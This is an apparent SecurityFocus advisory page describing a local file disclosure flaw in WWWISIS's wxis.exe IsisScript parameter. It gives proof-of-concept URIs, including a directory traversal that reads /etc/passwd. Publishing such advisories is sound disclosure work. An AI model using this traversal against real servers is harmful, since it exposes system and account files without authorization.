Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

WWWISIS IsisScript Local File Disclosure Vulnerability

Attackers may exploit this issue through a browser.

The following proof-of-concept URIs are available:

http://www.example.com/cgi-bin/wxis.exe/iah/?IsisScript=[file]
http://www.example.com/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd







 

Privacy Statement
Copyright 2008, SecurityFocus